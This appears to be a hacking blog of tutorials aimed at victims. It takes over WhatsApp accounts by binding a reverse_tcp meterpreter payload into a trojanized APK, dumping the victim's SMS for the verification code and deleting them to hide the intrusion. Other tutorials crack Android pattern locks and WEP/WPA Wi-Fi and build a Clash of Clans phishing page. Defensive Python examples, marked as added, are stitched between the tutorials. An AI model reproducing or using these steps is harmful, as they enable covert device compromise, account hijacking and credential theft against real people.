UrTrick World


How to Hack whatsapp 2017 method | with proof


Hack whatsapp account 2017 method


Note: Guys, this is not a direct method to hack WhatsApp, and it is not a single-click hack. It may or may not work; everything depends on your social skills and luck.

Whatsapp Hacking step by step Tutorial


Step 1: First, you need an app that the victim will download and install without any doubt, and we will bind our payload file with it. So select an app like a free version of a paid app or a hacked game. I am simply using ccleaner.

Step 2: Our next step is downloading/cloning the software, which is Spade. To download it, go to the terminal in your Kali and type:

 git clone https://github.com/suraj-root/spade.git


In a few moments the software will be installed on your Kali.

Step 3: The next step is binding the payload with this app, in my case ccleaner. Type the following command:

./spade.py /root/Desktop/ccleaner.apk

 

Note: My app is on the Desktop; if your app is in another directory, specify its path.

Step 4: After that you need to specify payload, lhost and lport. For payload select option 3, i.e. reverse_tcp.
Now lhost and lport:

LHOST: the IP address of your machine. If you are going through LAN, set your local IP, found by typing "ifconfig" in the terminal.

LPORT: the port on your machine that meterpreter will connect back to. It can be any port except 80.

Note: If you are hacking over WAN, your LHOST is your public IP address, which can be easily found through Google. Again, for WAN you need port forwarding, and set it as LPORT.

In my case:
Lhost > 192.168.0.104
Lport > 4444


Step 5: After it has all been done successfully, it will ask us to set the listener. Type 'y' here. A new apk will now be saved in the spade folder, named originalfinal.apk



Step 6: Now finally convince the victim to download and install the infected apk (originalfinal.apk); as soon as the victim opens the apk, you will get a session (what we needed).

Install WhatsApp on your phone and enter the victim's mobile number; WhatsApp will try to verify the number through SMS.

Step 7: To get that SMS, type the command
  dump_sms

A file containing all of the person's SMS, including that one, will be created in the spade directory. Use this OTP to start WhatsApp.



Now here are some points you must remember, or that you may face in real life.

#1 There is a 100% chance that your victim will notice that someone is using his WhatsApp account, as he will be asked to verify WhatsApp whenever he tries to open it. To prevent this situation, get the MAC address of the victim and spoof your MAC address. For spoofing, your phone must be rooted. Please go through Google about spoofing a MAC address.

#2 He would also be able to notice the SMS he received from WhatsApp; to solve this problem you need to delete his SMS. To do that, type

delete data/data/com/android.provider.telephony/database/mmsms.db

But this command only works if victim’s phone is rooted.

It will work if everything goes in your favor. Of course it's not one of the best or easiest methods. But it is helpful for understanding exploits and mixing things to perform a desired attack.

Please comment for any queries.

Crack Android Pattern Lock using kali | no root required 2017


How to crack Pattern locks without Data loss



Hi guys, since my last post we have been using Kali Linux for hacking. Let's analyze the power of Kali Linux by cracking the pattern lock of an Android device. Although many methods and tools (for various platforms like Windows, Mac or Linux) are available, their basic requirement is that the victim's phone must be rooted or debugging should be on. That does not make any sense; there is only the rarest chance that your victim would have a rooted phone with debugging on. Another, simpler method is flashing a new ROM, which means forgetting the data... But luckily Kali gives us the power to crack a pattern lock without root. I will show you two methods for cracking the Android screen lock.

Requirements:
Kali Linux (if you don't know how to make a live USB of Kali Linux, read it here)
Victim's android device
Memory card


Method 1: Pattern locks Cracking with Android Pattern Lock Cracker


OK, before you check and try, let's see which tool of the toolbox (Kali Linux) helps us. An Android pattern can be hacked with the help of Android Pattern Lock Cracker, a little tool to crack the pattern lock on Android devices.

How does the pattern lock work?

The pattern lock is the SHA1 hash of a sequence of digits (0-8) with length from 3 (4 since Android 2.3.3) to 8.
Since Android does not allow the pattern to repeat "balls" and it does not use a salt when computing the SHA1 hash, it really takes a very short period of time to crack the hash and get the pattern.
The gesture board is a 3x3 matrix, and can be represented as follows (each digit represents a "ball"):

 0 1 2
 3 4 5
 6 7 8

So if you set the pattern lock to 0 -> 1 -> 2 -> 5 -> 4, the SHA1 hash will be the output of SHA1("\x00\x01\x02\x05\x04"), and that is the hash to be cracked by this tool.

Where can I find the hash or pattern lock file?

The hash (pattern lock file) is stored at "/data/system/gesture.key".

How to Hack Android Pattern in unrooted device

1. First reset the Android device in Recovery Mode; if you don't know how, please Google it.

2. Now create a backup of the user data from Recovery Mode. Remember a memory card is required to create the file. This backup will be stored as userdata_xxxx_xxxxxx.backup on the memory card.

3. Now run your live Kali Linux and copy the userdata_xxxx_xxxxxx.backup from the memory card to the Desktop.

4. Now you have to convert and extract userdata_xxxx_xxxxxx.backup file. To do this type following commands:

cd ~/Desktop/

dd if=userdata_xxxx_xxxxxx.backup bs=512 skip=1 of=backup.tar.gz


*You may need to replace the userdata_xxxx_xxxxxx.backup with your file name.

mkdir backup


tar -xvf backup.tar.gz -C ~/Desktop/backup


5. Now you need the Android Pattern Lock Cracker tool on your device. To get it, open your terminal and type:

git clone https://github.com/sch3m4/androidpatternlock

6. Now let's try to hack the pattern lock using the following command:

python ~/Desktop/androidpatternlock/aplc.py ~/Desktop/backup/system/gesture.key


If you are not comfortable with command lines, I have another method for you, with a GUI.

Method 2: Pattern locks cracking with AndroidGestureCrack.

It is another tool for Kali Linux, but this time you don't need to face the command line; you work in a GUI. Let's first understand how it works.
AndroidGestureCrack is a Java tool to crack the Gesture Screenlock pattern of an Android Phone. It has been tested on Android API Level 15 and up, but should work with lower versions as well. As long as you extract the gesture.key file this tool will work.
The key is a SHA1 hash of the sequence of bytes for the gesture pattern. The hash is unsalted and hence is easier to crack.
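
Why the unsalted SHA-1 described here and under Method 1 gives no protection once gesture.key can be read, as an added example (not code from this post or from either tool): the whole keyspace fits in one precomputed table that works for every device, and a per-device salt is what breaks that reuse. It assumes patterns of 4 to 9 distinct dots on the 0-8 board; the function names and the salt are illustrative.

```python
import hashlib
import itertools
import math
import os

DOTS = range(9)  # the 3x3 board, dots numbered 0-8 as described on this page


def pattern_hash(seq, salt=b""):
    """SHA-1 over the raw dot indices. salt=b"" is the legacy unsalted scheme;
    a non-empty salt is this example's illustration, not Android's format."""
    return hashlib.sha1(salt + bytes(seq)).digest()


def keyspace(min_len=4, max_len=9):
    """Sequences of distinct dots: sum of 9!/(9-k)! over the allowed lengths.
    An upper bound; it ignores Android's rule against jumping over unused dots."""
    return sum(math.factorial(9) // math.factorial(9 - k)
               for k in range(min_len, max_len + 1))


def build_table(min_len=4, max_len=9, salt=b""):
    """Precompute hash -> pattern for every candidate, i.e. a dictionary file."""
    return {pattern_hash(p, salt): p
            for k in range(min_len, max_len + 1)
            for p in itertools.permutations(DOTS, k)}


if __name__ == "__main__":
    print("candidates, lengths 4-9:", keyspace())
    table = build_table(max_len=6)            # truncated to keep memory small
    stored = pattern_hash([0, 1, 2, 5, 4])    # the page's example pattern
    print("unsalted lookup:", table.get(stored))
    salt = os.urandom(16)                     # constructed per-device salt
    print("salted lookup:  ", table.get(pattern_hash([0, 1, 2, 5, 4], salt)))
    # A salt only stops table reuse. With under a million candidates the
    # search is still trivial for anyone who also holds the salt, so the real
    # fix is a slow, hardware-bound verifier with attempt throttling.
```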

First follow the same 4 steps as mentioned in Method 1 (I am not gonna write them again). Now you will have a backup folder on your desktop. Now follow this path, "Desktop/backup/data/system/", where you can find "gesture.key", and copy it to the Desktop. You will need this gesture.key later (at step 5).

1. Run kali on your pc and change your directory to desktop by typing in terminal:

cd Desktop


*cd is used to change the directory. You can learn other commands from Google.


2. Now you need AndroidGestureCrack in your Kali; type the following command.

git clone https://github.com/AnimeshShaw/AndroidGestureCrack


3. Now you need to unzip the AndroidGestureCrack.zip file with the following command.
unzip AndroidGestureCrack-master.zip

4. Now again change your directory to AndroidGestureCrack-master/jar as follows.
cd AndroidGestureCrack-master/jar


5. Now download the dictionary and unzip it. You will get an AndroidGestureSHA1.txt file. Move it to the Desktop.

6. To crack android pattern, type in terminal:
java -jar AndroidGestureCrack-2.1-Beta.jar --gui


A GUI box should be opened. 



Now you only need to provide the gesture.key file (on your desktop) and a dictionary text file (on your desktop). (Remember you have downloaded it in step 1).

Or you can type the following command instead of using the GUI.

java -jar AndroidGestureCrack-2.1-Beta.jar gesture.key AndroidGestureSHA1.txt


Let me know if you face any problem.

How to hack WEP secured wifi?


Hack wifi (WEP) using kali linux 


Hi guys, in my last post I posted some details of wifi encryption and how you can easily hack it with some simple GUI tools. But today I will show you how you can do the same thing with the command line in a terminal. Believe me, there are more chances of cracking wifi with command lines than with a GUI.
Alright, I am assuming you have Kali Linux running on your computer. If not, here is a post on hacking with kali linux.

Wifi Hacking: WEP using kali linux


To hack WEP-encrypted wifi, just follow these simple steps:

1. Find out the name of your wireless adapter.

Alright, your computer has many network adapters; you need to know its name. Open a new terminal and type:
ifconfig 
and hit enter.


So there are basically the following results that you need to know-
lo - loopback.
eth - ethernet
wlan0 or wlan1
 Note down your wlan(0/1/2) adapter.

2. Enable Monitor mode

To enable monitor mode just type:
airmon-ng check kill
airmon-ng start wlan0
 

Remember, my wireless adapter is wlan0; yours may vary with your wireless card.
The new monitor-mode interface will be created as mon0 in the case of Kali Linux version 1.0.
Note: If you are using Kali 2.0 then your new interface will be wlan0mon.


3. Start capturing packets

Now, we'll use airodump-ng to capture the packets of the wifi. This tool gathers data from the wireless packets of the wifi.
Type in the terminal:

airodump-ng mon0


For kali 2.0, replace mon0 with wlan0mon.
You'll see many wifi as well as the name of the wifi you want to hack.


4. Store the captured packets in a file

This can be achieved by giving some more parameters with the airodump command:
airodump-ng mon0 --write name_of_file


Again for kali 2.0, replace mon0 with wlan0mon.

Now the captured packets will be stored in name_of_file-01.cap. You will have to wait till you have enough data (10000 minimum).


5. Crack the wifi

When you have finally got 10000 packets (don't stop the packet capture yet), you can use aircrack-ng to crack the password.
In a new terminal type:
aircrack-ng name_of_file-01.cap

The program will ask which wifi to crack, if there are multiple available. Choose the wifi. It'll do its job. If the password is weak enough, then you'll get it in front of you. If not, the program will tell you to get more packets. The program will retry again when there are 15000 packets, and so on.

You'll get the key, probably in this format-
xx:xx:xx:xx:xx
Remove the colons
xxxxxxxxxx is the password of the wireless network. If you have any question, comment freely.
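
Seen from the network owner's side, the CSV that airodump-ng writes beside the capture in step 4 is enough to audit a site survey for access points that still advertise WEP. The parser below is an added example, not part of the original post; the sample rows are constructed, and the file name name_of_file-01.csv and the column layout are assumed from airodump-ng's default CSV output.

```python
# Constructed sample in the layout airodump-ng writes to name_of_file-01.csv:
# an access-point table, a blank line, then a client (station) table.
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:AA:BB:01, 2017-03-01 10:00:00, 2017-03-01 10:05:00,  6,  54, WEP, WEP, , -40, 120, 15000, 0.  0.  0.  0, 9, warehouse,
02:00:00:AA:BB:02, 2017-03-01 10:00:00, 2017-03-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55, 118, 230, 0.  0.  0.  0, 6, office,
02:00:00:AA:BB:03, 2017-03-01 10:00:00, 2017-03-01 10:05:00,  1,  54, OPN, , , -70, 90, 12, 0.  0.  0.  0, 11, guest,lobby,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:CC:DD:01, 2017-03-01 10:01:00, 2017-03-01 10:04:00, -50, 40, 02:00:00:AA:BB:02,
"""

FINDINGS = {
    "WEP": "WEP in use: move to WPA2 with a long passphrase",
    "OPN": "open network: no encryption",
}


def parse_access_points(text):
    """Return one dict per row of the access-point table."""
    aps, in_ap_table = [], False
    for line in text.splitlines():
        if line.startswith("BSSID"):
            in_ap_table = True
            continue
        if line.startswith("Station MAC"):
            break                      # client table follows; not needed here
        fields = line.split(",")
        if not in_ap_table or len(fields) < 15:
            continue                   # blank or truncated line
        aps.append({
            "bssid": fields[0].strip(),
            "channel": int(fields[3]),
            "privacy": fields[5].strip(),
            # ESSIDs are assumed unquoted, so a comma in the name adds fields;
            # everything between ID-length and the final Key column is ESSID.
            "essid": ",".join(fields[13:-1]).strip(),
        })
    return aps


def audit(text):
    """List (bssid, essid, channel, finding) for every weakly protected AP."""
    report = []
    for ap in parse_access_points(text):
        for token in ap["privacy"].split():
            if token in FINDINGS:
                report.append((ap["bssid"], ap["essid"], ap["channel"],
                               FINDINGS[token]))
    return report


if __name__ == "__main__":
    for row in audit(SAMPLE_CSV):
        print(*row, sep=" | ")
```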





Hack Wifi In Kali Linux 2017 Methods


How to hack wifi in kali linux


When it comes to hacking, wifi hacking is one of the most popular topics, because everyone wants a free internet connection. Many hacking tools, software and techniques have been used by hackers to crack highly secured Wi-Fi networks.
Kali Linux is one of them, but many people get confused: Kali Linux is not cracking software, it is a toolbox.
Note: Kali Linux is a toolkit; to hack wifi you have to choose the right tool. If one method doesn't work for you, try another. I will cover all available tools in my upcoming posts.
Before hacking wifi, you must be aware of the encryption technique used to secure it. This is not only for knowledge; it will help you choose a suitable attack for each kind of encrypted network.
There are different types of encryption, of which three basic ones are most common.

Wi-fi security: methods of encryption

These three methods of encryption have different types of vulnerability associated with wireless networks and can be hacked with different methods. The different types of wireless encryption security techniques include the following (not in deep detail):

WEP: WEP is Wired Equivalent Privacy that can be cracked easily when configured appropriately. This method of encryption can be cracked within 5 minutes.

WPA: WPA is Wi-Fi Protected Access that provides strong security. Even then, it is possible to crack it if the Wi-Fi password is short. However, wireless networks can be hacked easily using various tools.

WPA2: WPA2 is Wi-Fi Protected Access 2 that also eventually provides high security. You can hack this method of Wi-Fi encryption at the time of packet generation from Wi-Fi access points.


Techniques to hack wi-fi network

If you are much interested in hacking high security encryption based Wi-Fi networks, you need to arrange few things that are required at the time of Hacking process. After arranging all the essential things, you can hack a Wi-Fi network using few tools and techniques that can be seen below:

REQUIREMENTS

  • Kali Linux OS    
  • External Wi-Fi Adapter or Inbuilt Wi-Fi Device

  (Don't be confused, if your computer doesn’t have a wifi device, then you have to buy an external one).  




METHOD 1: HACK Wi-Fi Network using Wifite


Wifite is a Linux-based tool that is available on various operating systems like Kali, Backtrack 5, BlackBuntu, BackBox and Pentoo. Wifite is basically used to attack multiple encrypted networks (WEP, WPA/2 and WPS) in a row, and it can be automated with only a few arguments.
Simply type ‘wifite’ in terminal. Here, you can see List of Available Wi-Fi Access Points.
 Wait for few seconds in order to notice nearby Wi-Fi points like WEP, WPA/WPA2.


Steps to Hack WEP Encryption based Wi-Fi Network

Step 1. Just choose the appropriate target NUM (1,2,3,..) in order to crack it.  
Step 2. Make sure that the attack is completed within 10 minutes. You need not worry if one WEP WiFi attack fails, the other will come into action automatically for succeeding 10 minutes.  Within few minutes the WEP Wi-Fi network gets hacked.


Step 3. You can see the WEP key that is present in the above image. It is a Hexadecimal representation of WEP WiFi’s password. That WEP Key can be used as the Wi-Fi password. You can also convert the Wi-Fi password into actual password using online Hex-to-ASCII converter.

Steps to Hack WPA Encryption based Wi-Fi Network


Hacking a Wi-Fi network that uses WPA security encryption is a little bit tough compared to WEP, as this is a highly protected encryption method. It takes less time to hack a Wi-Fi network that uses a short password.
In order to hack this type of Wi-Fi network you need a handshake capture, and wifite will capture it. I will post another method to capture the handshake file in my post.


Handshake Capture:

Handshake is a file that can be captured when the router and client(s) communicate to authenticate each other. You may wonder, "What is the purpose of this handshake file?" The main target is to hack the Wi-Fi network. This handshake file contains the Wi-Fi password, but in encrypted form. To get that password we need to perform different kinds of attack on the handshake file.

The following attacks can be done on the handshake file.



Brute-Forcing: As the password is in encrypted form, let us try some other password combination on the encrypted password to acquire the original password. This process is known as Brute Forcing that is done offline. By using Brute-Forcing, the password present in the handshake file can be captured easily within few minutes.

Dictionary File:  In the below image, you can see dictionary which is a file that contains all known words from various sources usually phrased as Wi-Fi password. 


As soon as you start WPA handshake capture, it displays a message as “Client Found”.  It generates a command using handshake capture (that contains password) as (TEST_C0-A0-BB-04-5C-A9.cap). The above command cracks the password file that must be saved at /root/DICTIONARY/. Till now, you have used two WPA attacks that are completed successfully.


A password file usually contains words that are created using combinations of different characters, numbers and special symbols. Cracking a password requires a lot of computational power if it is a strong password including numbers and other special characters. The above WPA Wi-Fi security encryption got cracked easily because of an easy password. If you are dealing with a strong password, it might take more hours to crack the password.
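
How much the passphrase matters can be worked out from the key derivation itself: WPA/WPA2-PSK turns the passphrase into a 256-bit key with PBKDF2-HMAC-SHA1, 4096 iterations, salted with the network name, so every offline guess costs one such derivation. This added example (not from the original post) derives that key and rates a passphrase against a wordlist and an assumed guessing speed; the SSID, the wordlist and the figure of 1,000,000 guesses per second are constructed assumptions.

```python
import hashlib
import string
import time

CLASSES = (string.digits, string.ascii_lowercase,
           string.ascii_uppercase, string.punctuation + " ")
YEAR = 365 * 24 * 3600


def derive_pmk(passphrase, ssid):
    """Pairwise master key for WPA/WPA2-PSK (32 bytes, SSID as salt)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               4096, 32)


def local_guess_rate(samples=10):
    """Derivations per second on this machine, one CPU core, plain Python."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk("candidate-%04d" % i, "constructed-ssid")
    return samples / (time.perf_counter() - start)


def worst_case_seconds(passphrase, guesses_per_second):
    """Time to try every string of this length over the character classes used."""
    alphabet = sum(len(c) for c in CLASSES if any(ch in c for ch in passphrase))
    return max(alphabet, 1) ** len(passphrase) / guesses_per_second


def assess(passphrase, wordlist, guesses_per_second=1_000_000):
    """Rate a passphrase; the default speed is an assumed attacker, not a benchmark."""
    if not 8 <= len(passphrase) <= 63:
        return "rejected: WPA passphrases are 8 to 63 characters"
    if passphrase in wordlist:
        return "weak: listed in wordlist, falls to a dictionary run"
    seconds = worst_case_seconds(passphrase, guesses_per_second)
    if seconds < YEAR:
        return "weak: exhaustive search in %.0f s at the assumed rate" % seconds
    return "ok: about %.1e years of exhaustive search" % (seconds / YEAR)


if __name__ == "__main__":
    wordlist = {"password1", "letmein123"}        # constructed wordlist
    print("PMK:", derive_pmk("password1", "constructed-ssid").hex())
    print("this machine: %.0f guesses/s" % local_guess_rate())
    for candidate in ("password1", "48151623", "correct-horse-42x"):
        print(candidate, "->", assess(candidate, wordlist))
```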




METHOD 2:  HACK Wi-Fi Network using WIFIPHISHER




Wifiphisher is a security tool that performs one kind of phishing attacks which are against WPA networks. Unlike other methods of hacking, Wifiphisher is a type of social engineering attack that does not include brute forcing.
Wifiphisher is a tool that is used to hack a Wi-FI network and this attack makes use of three phases:

PHASE 1: Victim is being deauthenticated from their access point.


Wifiphisher tries to jam all the target access point’s wifi devices continuously that are available within range by sending deauth packets to the client from the access point.
 Then it starts generating fake access points by copying an access point from a set of access points shown below:


PHASE 2:
 This is the second phase where the Victim joins our fake access point.
It asks for password authentication.
 Wifiphisher sniffs the area and copies the target access point’s settings.
 Now, this tool creates a fake wireless access point that is modeled on the target by setting up a NAT/DHCP server and forwarding the right ports.
 Consequently, because of the jamming, clients will start connecting to the fake access point. After this phase, the victim is MITMed.


PHASE 3:
Victim is being served a realistic router config-looking page where the Wifiphisher tool employs a minimal web server that responds to HTTP & HTTPS requests.
    As soon as the victim requests a page from the Internet, wifiphisher responds with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.






Step by step hacking tutorials are coming… 

Hack clash of clans via wapka phishing


How to make clash of clans phishing site


Hi guys, hackers not only enjoy breaking systems; sometimes hackers also enjoy games, or, correct me, hackers also enjoy hacking a game. What if you could get another gamer's score, or more clearly, have another player's coc village? Yes, it is possible with the help of phishing. Today I am gonna show you how to make a coc phishing page in wapka.
Sometimes hacking is phishing people into your net, with your skills.
I am assuming you already know the various kinds of phishing popular on the internet, like facebook phishing, gmail phishing, blah blah...
Let's continue this series on phishing, since it is very easy; even a small kid can perform such a phishing attack with his mobile. The tedious part of such phishing is convincing the victim to sign up, which can be easily done by social engineering. The only disadvantage of phishing is that many people know about this kind of scam, so not everyone will be trapped in your net. But never underestimate phishing, if it is used with some skill. Anyway, I leave all this part to you, and show you how to make a phishing page for coc. For simplicity I am using wapka; there are other methods to make phishing pages.

Note: It is almost impossible to hack/crack coc. There is no online site which can hack coc and provide you thousands of gems for free. All sites about coc hacking are fake. Never believe such sites. Yes, xmod and a private server may help you a bit.

Clash of Clans phishing tutorial




Step 1: Of course you need a wapka account, so register a new Wapka account or login with your existing account.

Step 2: Now create a new site. It is recommended not to use any existing site, because an existing phishing link won't let the victim believe in your site. So create a new site with a tempting url, such as clash of clan hacking....

Then click on Manage.

Step 3: Now you have 2 modes available (admin mode and user mode). Click on Admin mode.

Step 4: As you click on Admin mode you are redirected to a blank page. It's blank because till now you have done nothing with your newly created site. You need to add code to your site.

At the lower rightmost corner you have a link ::EDIT SITE(#):: click on it.


Step 5: Now click on (WML/XHTML code).


Step 6:  Copy all the coc phishing code and paste it into (WML/XHTML code) box and click on Submit button.


Coc phishing script:





Step 7: It's all over; now send your site link, which was created at Step 2, to your victim. Since most people never trust sites ending in .wapka, you need to shorten this link and send the shortened link to your victim.



As your victim logs in to your page, his/her e-mail and password are sent to the e-mail with which you created your wapka account at the first step. Now you've got your victim's email and his village ha ha ha..